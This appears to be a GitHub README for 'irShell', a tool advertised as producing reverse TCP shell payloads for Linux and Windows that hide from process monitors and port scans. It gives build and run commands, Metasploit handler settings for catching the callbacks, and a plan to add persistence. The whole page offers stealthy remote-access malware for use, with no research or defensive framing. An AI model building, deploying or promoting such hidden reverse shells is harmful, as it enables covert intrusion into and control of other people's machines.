Skip to content

Latest commit

 

History

History
77 lines (48 loc) · 1.71 KB

File metadata and controls

77 lines (48 loc) · 1.71 KB

irShell

💯% Invisible Reverse TCP Shell Payloads for Linux/Windows 🥷

About:

What I believe to be an original and effective method for creating reverse TCP payloads that are 100% invisible not only to the target but the target's resource/process monitors, no PIDs or even open ports are visible. Simple MSFconsole handlers/listeners are then used for callbacks.

Pictured above is some Nmap and Grep output referencing this payloads used ports still showimg closed or not in use on the machine where the payload has been deployed. Pictured below are two screen captures of the same system's Htop output showing no process/PID

Requirments:

SHC

sudo apt install -y shc

Bash

sudo apt install -y bash

GCC

sudo apt install -y gcc

Installation:

git clone https://github.com/MBHudson/irShell.git && cd irShell && sudo gcc irShell.c -o irShell && sudo chmod +x irShell

Usage:

sudo ./irShell

MSFconsole:

set exploit/multi/handler
set PAYLOAD linux/x64/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

TODO

  • Persistence without reboot
  • EXE and Shell formats
  • All-in-One built-in dependency installation